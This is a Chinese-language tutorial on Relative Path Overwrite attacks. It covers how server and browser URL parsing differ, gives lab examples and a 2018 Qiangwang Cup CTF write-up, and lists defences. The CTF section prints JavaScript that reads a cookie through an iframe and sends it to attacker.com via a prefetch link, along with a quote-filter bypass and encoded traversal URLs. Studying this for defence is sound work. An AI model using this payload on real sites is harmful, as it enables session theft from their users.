RPO攻击方式深度解析与实战教学<\/h1>

一、RPO基础概念<\/h2>
RPO (Relative Path Overwrite)<\/strong> 即相对路径覆盖攻击，由Gareth Heyes在2014年首次提出。该攻击利用服务器（如nginx或配置错误的Apache）与浏览器对URL解析的差异，通过相对路径引用的CSS或JS文件实现跨目录读取，甚至将非JS\/CSS页面当做脚本解析，从而触发XSS等进一步攻击。<\/p>

二、攻击前提条件<\/h2>

服务器配置条件<\/strong>：<\/p>

Apache服务器开启AllowEncodedSlashes<\/code>选项（默认关闭）<\/li>
或使用nginx服务器（自动解码%2f<\/code>为\/<\/code>）<\/li> <\/ul> <\/li>
应用条件<\/strong>：<\/p> 存在使用相对路径引用的JS或CSS文件<\/li> <\/ul> <\/li> <\/ol> 三、技术原理详解<\/h2> 服务器与浏览器的URL解析差异<\/h3> Apache默认行为<\/strong>：<\/p> 不认识..%2f<\/code>，将其视为字面文件名<\/li> 示例：http:\/\/localhost\/RPO\/test\/..%2fapache.php<\/code> → 寻找名为..%2fapache.php<\/code>的文件<\/li> <\/ul> <\/li> Nginx行为<\/strong>：<\/p> 自动将..%2f<\/code>解码为..\/<\/code><\/li> 示例：http:\/\/localhost\/RPO\/test\/..%2fnginx.php<\/code> → 解析为http:\/\/localhost\/RPO\/nginx.php<\/code><\/li> <\/ul> <\/li> <\/ol> 攻击流程示例<\/h3> 基础场景<\/strong>：<\/p> 目录结构： \/RPO ├── index.php └── \/test └── a.js <\/code><\/pre> <\/li> index.php<\/code>内容： <html<\/span>> <\/span><\/span><head<\/span>><\/head<\/span>> <\/span><\/span><body<\/span>> <\/span><\/span> <script<\/span> src<\/span>=<\/span>a.js<\/span>><\/script<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 攻击步骤<\/strong>：<\/p> 访问URL：http:\/\/localhost\/RPO\/test\/..%2findex.php<\/code><\/li> 服务器解码：将..%2f<\/code>视为..\/<\/code>，实际返回\/RPO\/index.php<\/code><\/li> 浏览器视角：仍认为当前路径为\/RPO\/test\/..%2findex.php<\/code><\/li> 加载a.js<\/code>时：浏览器从\/RPO\/test\/a.js<\/code>加载（而非预期的\/RPO\/a.js<\/code>）<\/li> <\/ol> 四、高阶利用技巧<\/h2> 将HTML页面作为JS解析<\/h3> 关键条件<\/strong>：网站启用了URL重写（URL Rewrite）<\/p> 示例场景<\/strong>：<\/p> index.php<\/code>： <!<\/span>DOCTYPE<\/span> html<\/span>><\/span> <\/span><\/span><<\/span>html<\/span>><\/span> <\/span><\/span><<\/span>head<\/span>><\/span>RPO<\/span> attack<\/span> test<\/span><\/<\/span>head<\/span>><\/span> <\/span><\/span><<\/span>body<\/span>><\/span> <\/span><\/span> <<\/span>script<\/span> src<\/span>=<\/span>"3.js"<\/span>><\/<\/span>script<\/span>><\/span> <\/span><\/span><\/<\/span>body<\/span>><\/span> <\/span><\/span><\/<\/span>html<\/span>><\/span> <\/span><\/span><?<\/span>php<\/span> <\/span><\/span>if<\/span>($_GET['page'<\/span>]) { <\/span><\/span> $a=<\/span>$_GET['page'<\/span>]; <\/span><\/span> Header<\/span>('Location: http:\/\/localhost\/RPO\/test\/ '<\/span>.<\/span>"<\/span>$a<\/span>"<\/span>.<\/span>'.html'<\/span>); <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 3.html<\/code>内容：alert("RPO attack");<\/code><\/li> <\/ul> 攻击流程<\/strong>：<\/p> 访问URL：http:\/\/localhost\/RPO\/index.php\/page\/3\/..%2f..%2f..%2findex.php<\/code><\/li> 服务器解析为：http:\/\/localhost\/RPO\/index.php\/page\/3\/index.php<\/code><\/li> 返回index.php<\/code>内容<\/li> 浏览器尝试加载3.js<\/code>，实际请求：http:\/\/localhost\/RPO\/index.php\/page\/3\/3.js<\/code><\/li> 服务器返回3.html<\/code>内容，被浏览器当做JS执行<\/li> <\/ol> 五、实战案例分析（2018强网杯题目）<\/h2> 题目分析<\/h3> 分享平台功能：<\/p> Write界面：可写入自定义内容（XSS payload被过滤）<\/li> Overview界面：完全转义用户输入<\/li> Report界面：提交URL供bot访问（使用PhantomJS 2.1）<\/li> <\/ul> <\/li> 发现点：<\/p> 在index.php<\/code>中发现相对路径JS引用<\/li> 需要利用RPO改变页面解析方式<\/li> <\/ul> <\/li> <\/ol> 攻击构造<\/h3> Payload构造<\/strong>：<\/p> 避免使用标题栏（自动添加<h><\/code>标签会破坏JS解析）<\/li> 使用String.fromCharCode<\/code>绕过引号过滤<\/li> <\/ul> <\/li> 分阶段攻击<\/strong>：<\/p> 第一阶段：让bot访问精心构造的页面<\/li> 第二阶段：通过iframe获取\/QWB_f14g\/QWB\/<\/code>目录的cookie<\/li> 第三阶段：将cookie发送到攻击者服务器<\/li> <\/ul> <\/li> 关键代码<\/strong>：<\/p> <\/li> <\/ol> var<\/span> iframe<\/span> =<\/span> document.createElement<\/span>("iframe"<\/span>); <\/span><\/span>iframe<\/span>.src<\/span> =<\/span> "\/QWB_f14g\/QWB\/"<\/span>; <\/span><\/span>iframe<\/span>.id<\/span> =<\/span> "frame"<\/span>; <\/span><\/span>document.body<\/span>.appendChild<\/span>(iframe<\/span>); <\/span><\/span>iframe<\/span>.onload<\/span> =<\/span> function<\/span> (){ <\/span><\/span> var<\/span> c<\/span> =<\/span> document.getElementById<\/span>('frame'<\/span>).contentWindow<\/span>.document.cookie<\/span>; <\/span><\/span> var<\/span> n0t<\/span> =<\/span> document.createElement<\/span>("link"<\/span>); <\/span><\/span> n0t<\/span>.setAttribute<\/span>("rel"<\/span>, "prefetch"<\/span>); <\/span><\/span> n0t<\/span>.setAttribute<\/span>("href"<\/span>, "http:\/\/attacker.com?flag="<\/span> +<\/span> c<\/span>); <\/span><\/span> document.head<\/span>.appendChild<\/span>(n0t<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>六、防御措施<\/h2> 服务器配置<\/strong>：<\/p> Apache：保持AllowEncodedSlashes<\/code>关闭（默认状态）<\/li> Nginx：添加规则过滤或拦截包含%2f<\/code>的请求<\/li> <\/ul> <\/li> 开发规范<\/strong>：<\/p> 使用绝对路径引用静态资源（以\/<\/code>开头）<\/li> 避免URL重写功能与相对路径引用混用<\/li> 设置正确的Content-Type<\/code>头部<\/li> <\/ul> <\/li> 补充措施<\/strong>：<\/p> 实施严格的输入过滤<\/li> 设置合适的CSP策略<\/li> 对cookie设置HttpOnly<\/code>和Secure<\/code>属性<\/li> <\/ul> <\/li> <\/ol> 七、总结<\/h2> RPO攻击是一种利用URL解析差异的新型攻击方式，其关键在于：<\/p> 服务器与浏览器对编码字符的解析不一致<\/li> 相对路径资源引用的使用<\/li> URL重写功能的配合<\/li> <\/ol> 通过精心构造的请求，攻击者可以实现跨目录文件读取甚至XSS攻击。防御的核心在于统一资源引用路径和严格服务器配置。<\/p>